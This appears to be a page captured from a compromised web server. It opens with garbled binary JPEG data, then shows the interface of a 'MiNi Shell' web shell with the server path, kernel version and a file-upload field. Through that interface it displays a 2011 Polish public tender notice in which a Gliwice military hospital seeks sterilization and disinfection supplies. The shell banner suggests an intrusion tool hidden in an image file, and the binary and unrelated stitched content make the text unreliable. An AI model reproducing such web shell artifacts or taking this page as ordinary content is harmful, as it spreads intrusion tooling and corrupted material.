JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110518/119466-N-2011.html

<p class="kh_header"><b>Gliwice: Dostawa materiałów do dezynfekcji i sterylizacji</b><br>
<b>Numer ogłoszenia: 119466 - 2011; data zamieszczenia: 18.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 106 Szpital Wojskowy z Przychodnią SPZOZ , ul. Zygmunta Starego 20, 44-100 Gliwice, woj. śląskie, tel. 032 2318888 w. 304, faks 032 2318888 w. 301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> 05707491@pro.onet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów do dezynfekcji i sterylizacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów do dezynfekcji i sterylizacji
OPIS PRZEDMIOTU ZAMÓWIENIA
1.Zamówienie obejmuje 8 części (zadań, pakietów), których pełny wykaz stanowi załącznik do formularza oferty.
2.Zamawiający dopuszcza składanie ofert częściowych.
3.W ramach każdej części (zadania, pakietu) należy wypełnić wszystkie pozycje.
4.Niewypełnienie którejkolwiek z pozycji w ramach pakietu skutkować będzie odrzuceniem oferty jako niezgodnej z SIWZ. 

Wymagania dla poszczególnych zdań (pakietów)
1. Materiały do sterylizacji
a) Zamówienie obejmuje 18 pozycji
b) Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązuje się do użyczenia na rzecz Zamawiającemu 1 (jednej) sztuki metkownicy 3-rz. ETS-BR na okres trwania umowy przetargowej.
c) Dotyczy pozycji od nr 1 do nr 7
Rękawy papierowo-foliowe z testem do sterylizacji parowej (S) i tlenkiem etylenu (EO). Konstrukcja i wykonanie zgodne z normami: PNEN 868-3, PNEN 868-5 oraz:
PAPIER 
- o gramaturze 70g, wymagana charakterystyka wydana przez producenta w celu potwierdzenia i oceny parametrów wytrzymałościowych i zgodności z normą PNEN 868-3- przedstawiana Zamawiającemu na każde żądanie
- zawartość chlorków nie więcej niż 0,05%
- zawartość siarczanów nie więcej niż 0,25%
- wytrzymały na przedarcia i rozciąganie
- niezwilżalność wodą minimum 40 sek.
FOLIA
- minimum pięciowarstwowa nie biorąc pod uwagę warstwy kleju, wymagane wydane przez producenta folii oświadczenie o zgodności z normami PNEN 868-3, PNEN 868-5 i charakterystyka folii w celu potwierdzenia i oceny parametrów wytrzymałościowych i zgodności, przedstawiona Zamawiającemu na każde jego żądanie
- przeźroczysta, bez rozwarstwień, bez substancji toksycznych i porów
- zgrzewalna w temp. 150-190°C
- wytrzymała na rozdarcie w obu kierunkach
- elastyczna
- wszystkie napisy i testy poza przestrzenią pakowania
- jednoznacznie oznaczony kierunek otwierania
- zgrzew fabryczny wielokrotny
- wykluczone umieszczenie testu między warstwami folii
- wskaźniki procesu parą wodną i EO
Wszystkie oferowane rozmiary asortymentu z pakietów od nr 1 do nr 7 muszą być ze soba kompatybilne (np. mogą pochodzić od jednego producenta).
d) Dotyczy pozycji nr 8 i 9
Wymaganą przez Zamawiającego ilość arkuszy papieru sterylizacyjnego należy podzielić kolorystycznie w stosunku 1:1 na dwa kolory, biały/zielony.
Należy tak zrobić dla obu pozycji osobno.
I generacja - włókno celulozowe, kolor zielony i biały o właściwościach:
zawartość chlorków nie więcej niż 0,02%
zawartość siarczanów nie więcej niż 0,02%
wytrzymały na rozciąganie liniowe i poprzeczne zarówno na mokro jak i na sucho
gramatura nominalna 60g/m2 (tolerancja wg PNEN 868-2)
wymagana charakterystyka wytrzymałościowa wydana przez producenta w celu potwierdzenia i oceny parametrów wytrzymałościowych i zgodności- na każde żądanie Zamawiającego
e) Dotyczy pozycji nr 10
Wskaźnik procesu - taśma wskaźnikowa - wymagana charakterystyka techniczna producenta- na każde żądanie Zamawiającego
f) Dotyczy pozycji nr 12
Jednorazowy pakiet typu BOWIE DICK  zgodny z normą EN 867-4 (zgodność potwierdzona przez niezależną organizację akredytacyjną). Nietoksyczny pakiet kontrolny dla parametrów: 134°C/3,5 min., kontrolujący penetrację i jakość pary, symulujący ładunek porowaty, arkusz wskaźnikowy w technologii TST lub równoważnej (o parametrach wskazanych przez wzór wskazany przez Zamawiającego).
g) Dotyczy pozycji nr 13
Nietoksyczny wskaźnik wieloparametrowy odpowiadający klasie 4 ISO 11140-1 dla parametrów : 121°C-20 min.,134°C-7min. 
h) Dotyczy pozycji nr 14
Nietoksyczny wskaźnik skuteczności procesu  o wartościach ustalonych 121°C-20min i 134°C-7min, odpowiadający klasie 6 wg ISO 11140-1. Wymagane potwierdzenie klasy testu przez niezależną organizację notyfikowaną. 
i) Dotyczy pozycji nr 15
Ampułkowy wskaźnik biologiczny o czasie inkubacji do 48 godz., wymagane określenie warunków zabicia w temp. 121°C i 134°C- na każde żądanie Zamawiającego.
j) Dotyczy pozycji nr 16
Biologiczny wskaźnik kontroli procesu sterylizacji parą wodną w podciśnieniu, w postaci paska bibuły nasyconego zawiesiną spor szczepu Bacillus stearothermophilus ATCC 7953 w opakowaniu papierowo-foliowym zabezpieczającym przed skażeniem. 
k) Dotyczy pozycji nr 17
Test do codziennej kontroli zgrzewarek rolkowych - sprawdzian zgrzewu, pozwalający na wykazanie poprawności zgrzewu opakowania w codziennej pracy i na udokumentowanie tej prawidłowości dla opakowań papierowo-foliowych
l) Dotyczy pozycji nr 18
Koperty dokumentacyjne przystosowane do etykiet i wskaźników wymienionych niże
Etykiety podwójnie-przylepne odpowiadające  metkownicy 3-rz. do ETS-BR
Rolka zapasowa z tuszem do metkownicy kompatybilna z metkownicą.
wskaźnik do sterylizacji o wartościach ustalonych [UW] 121 OC 20 min i 134 OC 7 min odpowiadający klasie 6 wg ISO 11140-1, SAMOPRZYLEPNY, nietoksyczny.
m) Na każde żądanie Zamawiającego Wykonawca poda oryginalny kod towaru i wykaże jego zgodność z towarem oferowanym. Numery katalogowe oferowanego towaru muszą być zgodne z numerami wpisanymi do zgłoszenia w Urzędzie Rejestracji Wyrobów Medycznych lub w certyfikatach zgodności CE oraz z numerami w dokumentach dotyczących jakości.

2.Pakiety 2-8 wymagania ogólne
Przedmiot zamówienia musi spełniać wymagania określone w:
- ustawie z dnia 20 maja 2010r. o wyrobach medycznych ( Dz.U. z 2010r. nr 107, poz.679)
- ustawie z dnia 13 września 2002r. O produktach biobójczych (Dz.U. z 2007r. nr 39, poz. 252 z późn. zm.)
- rozporządzenieu Ministra Zdrowia z dnia 17 stycznia 2003r. w sprawie kategorii i grup produktów biobójczych według ich przeznaczenia (Dz.U. z 2003r. nr 16, poz. 150)
oraz inne wymagania nakładane przez przepisy prawa powszechnie obowiązującego.

Na każde żądanie Zamawiającego Wykonawca przedstawi:
- Katalog lub prospekt lub folder/ulotka w języku polskim dla każdego zaoferowanego przedmiotu zamówienia zawierający opis składu jakościowego, ilościowego i spektrum działania w określonym czasie . W materiałach należy zaznaczyć który parametr w katalogu odpowiada parametrowi wymaganemu przez Zamawiającego z podaniem nr strony. 
- Karta charakterystyki substancji niebezpiecznej każdego zaoferowanego środka dezynfekcyjnego w języku polskim wydana przez producenta przedmiotu zamówienia
- Potwierdzenie stosownym dokumentem działania bójczego oferowanych środków ( do narzędzi i powierzchni) w zakresie wymaganego spektrum poparte opinią PZH lub innego niezależnego, certyfikowanego ośrodka badawczego, towarzystwa mikrobiologicznego lub innej instytucji wydającej opinie o środkach dezynfekcyjnych stosowanych w praktyce szpitalnej z terenu Unii Europejskiej
Każdy oferowany preparat musi mieć datę przydatności do użycia minimum dwa lata od daty dostarczenia zamówienia do Zamawiającego (wyjątek to preparaty do higieny i dezynfekcji jamy ustnej pacjenta - tu Zamawiający dopuszcza czas przydatności do użytku min. 12 mies.).
Oferent, który przystąpi do przetargu na pakiet nr 2- Preparaty higieniczne i odkażające do skóry rąk, ciała, pola operacyjnego, błon śluzowych - w przypadku, gdy jego oferta zostanie wybrana jako najkorzystniejsza, zobowiązuje się jednocześnie do użyczenia na czas trwania umowy na rzecz Zamawiającego 20 sztuk dozowników łokciowych na preparaty do dezynfekcji i mycia higienicznego rąk. Dozowniki muszą pasować do zaoferowanych w przetargu opakowań preparatów, muszą być łatwe w demontażu i utrzymaniu w czystości. 
Oferent, który przystąpi do złożenia oferty na pakiet nr 4- dezynfekcja, mycie i konserwacja manualna narzędzi i sprzętu medycznego, w tym anestezjologicznego -w przypadku, gdy zostanie ona wybrana jako najkorzystniejsza, zobowiązuje się jednocześnie do użyczenia na czas trwania umowy na rzecz Zamawiającego 4 sztuk wanienek dezynfekcyjnych o pojemności od 6 do 8 L, 10 sztuk wanienek dezynfekcyjnych o pojemności 2L i 2 szt. wanienek o poj. 10 L.
Wanienki muszą być atestowane, posiadać wkład-sito (wyjątek może stanowić wanienka 10L.), przezierną pokrywę, nie ulegać przebarwieniu i uszkodzeniu pod wpływem działania preparatów dezynfekcyjnych. Dostawa wanienek odbędzie się na zapotrzebowanie Zamawiającego.
Oferent, który przystąpi do przetargu na pakiety nr 2 i nr 4 zobowiązuje się nieodpłatnie, w przypadku, gdy jego oferta zostanie wybrana jako najkorzystniejsza, do przeprowadzenia minimum dwóch szkoleń dla jednego pakietu, w ciągu jednego roku kalendarzowego z zakresu zakażeń na rzecz personelu Zamawiającego. Czas trwania szkolenia min. 45 min., jeżeli Oferent będzie chciał przeprowadzić prezentację własnych produktów należy do uwzględnić jako czas dodatkowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/szw-gliwice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy za SIWZ w formie pisemnej Zamawiający pobiera opłatę w wysokości 20,00 zł. + koszt wysyłki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego w Kancelarii ogólnej Szpitala, (budynek nr 4- Administracja, pokój nr 001) Gliwice ul. Zygmunta Starego 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały do sterylizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 18 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Preparaty higieniczne i odkażające do skóry rąk, ciała, pola operacyjnego, błon śluzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 13 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Preparaty higieniczne i odkażające do skóry rąk, ciała, pola operacyjnego, błon śluzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dezynfekcja, mycie i konserwacja manualna narzędzi i sprzętu medycznego, w tym anestezjologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 5 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dezynfekcja i mycie sprzętu, powierzchni medycznych, w tym akrylowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 5 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Manualna oprawa (mycie i dezynfekcja) sprzętu endoskopowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Maszynowa oprawa (mycie, dezynfekcja) sprzętu endoskopowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dezynfekcja, mycie powierzchni, narzędzi, sprzętu i aparatury stomatologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 5 części.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com